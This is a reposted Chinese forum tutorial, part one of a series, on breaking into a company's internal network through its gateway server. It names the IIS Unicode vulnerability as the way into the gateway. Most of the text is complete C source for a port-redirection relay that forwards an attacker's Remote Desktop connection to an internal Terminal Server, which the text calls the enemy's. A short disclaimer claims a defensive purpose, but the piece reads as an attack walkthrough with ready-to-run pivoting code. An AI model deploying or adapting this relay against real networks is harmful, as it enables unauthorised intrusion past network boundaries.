突破TCP-IP过滤-防火墙进入内网（一）

发布: 2007-7-02 21:50 | 作者: admin | 来源: | 查看: 13次 | 进入软件测试论坛讨论

　　(注:本站转载这篇文章旨在希望通过这篇文章来如何预防网络的安全,并不鼓励读者去做相应的破坏活动,特此声明)

　　作者:eyas

　　现在很多企业或者公司基本上网方式基本上都是申请一条连接到Inte.net的线路，宽带、DDN、ADSL、ISDN等等，然后用一台服务器做网关，服务器两块网卡，一块是连接到Internet，另一块是连接到内网的HUB或者交换机,然后内网的其他机器就可以通过网关连接到Internet。

　　也许有些人会这样想，我在内网之中，我们之间没有直接的连接，你没有办法攻击我。事实并非如此，在内网的机器同样可能遭受到来自Internet的攻击，当然前提是攻击者已经取得网关服务器的某些权限，呵呵，这是不是废话？其实，Internet上很多做网关的服务器并未经过严格的安全配置，要获取权限也不是想象中的那么难。

　　Ok!废话就不说了，切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到敌人内网的TermServer机器。M$的终端服务是一个很好的远程管理工具，不是吗？呵呵。没有做特别说明的话，文中提到的服务器OS都为windows 2000。服务器为Linux或其他的话，原理也差不多，把程序稍微修改就行了。

第一部分：利用TCP socket数据转发进入没有防火墙保护的内网

　　假设敌人网络拓扑如下图所示，没有安装防火墙或在网关服务器上做TCP/IP限制。



sever--Ethernet--攻击者 

| 

hup-192.168.1.x 

| 

192.168.1.3

　　我们的目标是连接上敌人内网的Terminal Server[192.168.1.3]，因为没有办法直接和他建立连接，那么只有先从它的网关服务器上下手了。假如敌人网关服务器是M$的windows 2k，IIS有Unicode漏洞[现在要找些有漏洞的机器太容易了，但我只是scripts kid，只会利用现成的漏洞做些简单的攻击：（555），那么我们就得到一个网关的shell了，我们可以在那上面运行我们的程序，虽然权限很低，但也可以做很多事情了。Ok!让我们来写一个做TCP socket数据转发的小程序，让敌人的网关服务器忠实的为我[202.1.1.1]和敌人内网的TermServer[192.168.1.3]之间转发数据。题外话：实际入侵过程是先取得网关服务器的权限，然后用他做跳板，进一步摸清它的内部网络拓扑结构，再做进一步的入侵，现在敌人的网络拓扑是我们给他设计的，哈哈。

　　攻击流程如下：

　　<1>在网关服务器202.2.2.2运行我们的程序AgentGateWay，他监听TCP 3389端口[改成别的，那我们就要相应的修改TermClient了]等待我们去连接。

　　<2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。

　　<3>202.2.2.2.接受202.1.1.1的连接，然后再建立一个TCP socket连接到自己内网的TermServer[192.168.1.3]

　　<4>这样我们和敌人内网的TermServer之间的数据通道就建好了，接下来网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候，其实出来的界面是敌人内网的192.168.1.3，感觉怎么样？：）

　　程序代码如下：



/********************************************************************** 



Module Name:AgentGateWay.c 



Date:2001/4/15 



CopyRight(c) eyas 



说明：端口重定向工具，在网关上运行，把端口重定向到内网的IP、PORT， 



就可以进入内网了 



sock[0]==>sClient sock[1]==>sTarget 



**********************************************************************/ 



#include  



#include  



#include "TCPDataRedird.c" 







#define TargetIP TEXT("192.168.1.3") 



#define TargetPort (int)3389 



#define ListenPort (int)3389//监听端口 







#pragma comment(lib,"ws2_32.lib") 







int main() 



{ 



WSADATA wsd; 



SOCKET sListen=INVALID_SOCKET,//本机监听的socket 



sock[2]; 



struct sockaddr_in Local,Client,Target; 



int iAddrSize; 



HANDLE hThreadC2T=NULL,//C2T=ClientToTarget 



hThreadT2C=NULL;//T2C=TargetToClient 



DWORD dwThreadID; 







__try 



{ 



if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 



{ 



printf(" WSAStartup() failed:%d",GetLastError()); 



__leave; 



} 



sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 



if(sListen==INVALID_SOCKET) 



{ 



printf(" socket() failed:%d",GetLastError()); 



__leave; 



} 







Local.sin_addr.s_addr=htonl(INADDR_ANY); 



Local.sin_family=AF_INET; 



Local.sin_port=htons(ListenPort); 







Target.sin_family=AF_INET; 



Target.sin_addr.s_addr=inet_addr(TargetIP); 



Target.sin_port=htons(TargetPort); 







if(bind(sListen,(struct sockaddr *)&Local,sizeof(Local))==SOCKET_ERROR) 



{ 



printf(" bind() failed:%d",GetLastError()); 



__leave; 



} 



if(listen(sListen,1)==SOCKET_ERROR) 



{ 



printf(" listen() failed:%d",GetLastError()); 



__leave; 



} 



//scoket循环 



while(1) 



{ 



printf(" *************Waiting Client Connect to************** "); 



iAddrSize=sizeof(Client); 



//get socket sClient 



sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize); 



if(sock[0]==INVALID_SOCKET) 



{ 



printf(" accept() failed:%d",GetLastError()); 



break; 



} 



printf(" Accept client==>%s:%d",inet_ntoa(Client.sin_addr), 



ntohs(Client.sin_port)); 



//create socket sTarget 



sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 



if(sock[1]==INVALID_SOCKET) 



{ 



printf(" socket() failed:%d",GetLastError()); 



__leave; 



} 



//connect to target port 



if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR) 



{ 



printf(" connect() failed:%d",GetLastError()); 



__leave; 



} 



printf(" connect to target 3389 success!"); 



//创建两个线程进行数据转发 



hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID); 



hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID); 



//等待两个线程结束 



WaitForSingleObject(hThreadC2T,INFINITE); 



WaitForSingleObject(hThreadT2C,INFINITE); 



CloseHandle(hThreadC2T); 



CloseHandle(hThreadT2C); 



closesocket(sock[1]); 



closesocket(sock[0]); 



printf(" *****************Connection Close******************* "); 



}//end of sock外循环 



}//end of try 



__finally 



{ 



if(sListen!=INVALID_SOCKET) closesocket(sListen); 



if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]); 



if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]); 



if(hThreadC2T!=NULL) CloseHandle(hThreadC2T); 



if(hThreadT2C!=NULL) CloseHandle(hThreadT2C); 



WSACleanup(); 



} 



return 0; 



} 



/************************************************************************* 



Module:TCPDataRedird.c 



Date:2001/4/16 



CopyRight(c) eyas 



HomePage:www.patching.net 



Thanks to shotgun 



说明:TCP socket数据转发,sock[0]==>sClient sock[1]==>sTarget 



*************************************************************************/ 



#define BuffSize 20*1024 //缓冲区大小20k 



//此函数负责从Client读取数据，然后转发给Target 



DWORD WINAPI TCPDataC2T(SOCKET* sock) 



{ 



int iRet, 



ret=-1,//select 返回值 



iLeft, 



idx, 



iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize 



char szSendToTargetBuff[BuffSize]={0}, 



szRecvFromClientBuff[BuffSize]={0}; 



fd_set fdread,fdwrite; 



printf(" *****************Connection Active******************* "); 



while(1) 



{ 



FD_ZERO(&fdread); 



FD_ZERO(&fdwrite); 



FD_SET(sock[0],&fdread); 



FD_SET(sock[1],&fdwrite); 



if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR) 



{ 



printf(" select() failed:%d",GetLastError()); 



break; 



} 



//printf(" select() return value ret=%d",ret); 



if(ret>0) 



{ 



//sClinet可读，client有数据要发送过来 



if(FD_ISSET(sock[0],&fdread)) 



{ 



//接收sock[0]发送来的数据 



iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0); 



if(iRet==SOCKET_ERROR) 



{ 



printf(" recv() from sock[0] failed:%d",GetLastError()); 



break; 



} 



else if(iRet==0) 



break; 



printf(" recv %d bytes from sClinet.",iRet); 



//把从client接收到的数据存添加到发往target的缓冲区 



memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet); 



//刷新发往target的数据缓冲区当前buff大小 



iSTTBCS+=iRet; 



//清空接收client数据的缓冲区 



memset(szRecvFromClientBuff,0,BuffSize); 



} 



//sTarget可写，把从client接收到的数据发送到target 



if(FD_ISSET(sock[1],&fdwrite)) 



{ 



//转发数据到target的3389端口 



iLeft=iSTTBCS; 



idx=0; 



while(iLeft>0) 



{ 



iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0); 



if(iRet==SOCKET_ERROR) 



{ 



printf(" send() to target failed:%d",GetLastError()); 



break; 



} 



printf(" send %d bytes to target",iRet); 



iLeft-=iRet; 



idx+=iRet; 



} 



//清空缓冲区 



memset(szSendToTargetBuff,0,BuffSize); 



//重置发往target的数据缓冲区当前buff大小 



iSTTBCS=0; 



} 



}//end of select ret 



Sleep(1); 



}//end of data send & recv循环 



return 0; 



} 



//此函数负责从target读取数据，然后发送给client 



DWORD WINAPI TCPDataT2C(SOCKET* sock) 



{ 



int iRet, 



ret=-1,//select 返回值 



iLeft, 



idx, 



iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize 



char szRecvFromTargetBuff[BuffSize]={0}, 



szSendToClientBuff[BuffSize]={0}; 



fd_set fdread,fdwrite; 







while(1) 



{ 



FD_ZERO(&fdread); 



FD_ZERO(&fdwrite); 



FD_SET(sock[0],&fdwrite); 



FD_SET(sock[1],&fdread); 



if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR) 



{ 



printf(" select() failed:%d",GetLastError()); 



break; 



} 



if(ret>0) 



{ 



//sTarget可读，从target接收数据 



if(FD_ISSET(sock[1],&fdread)) 



{ 



//接收target返回数据 



iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0); 



if(iRet==SOCKET_ERROR) 



{ 



printf(" recv() from target failed:%d",GetLastError()); 



break; 



} 



else if(iRet==0) 



break; 



printf(" recv %d bytes from target",iRet); 



//把从target接收到的数据添加到发送到client的缓冲区 



memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet); 



//清空接收target返回数据缓冲区 



memset(szRecvFromTargetBuff,0,BuffSize); 



//刷新发送到client的数据缓冲区当前大小 



iSTCBCS+=iRet; 



} 



//client可写，发送target返回数据到client 



if(FD_ISSET(sock[0],&fdwrite)) 



{ 



//发送target返回数据到client 



iLeft=iSTCBCS; 



idx=0; 



while(iLeft>0) 



{ 



iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0); 



if(iRet==SOCKET_ERROR) 



{ 



printf(" send() to Client failed:%d",GetLastError()); 



break; 



} 



printf(" send %d bytes to Client",iRet); 



iLeft-=iRet; 



idx+=iRet; 



} 



//清空缓冲区 



memset(szSendToClientBuff,0,BuffSize); 



iSTCBCS=0; 



} 



}//end of select ret 



Sleep(1); 



}//end of while 



return 0; 



}

　　转自:www.patching.net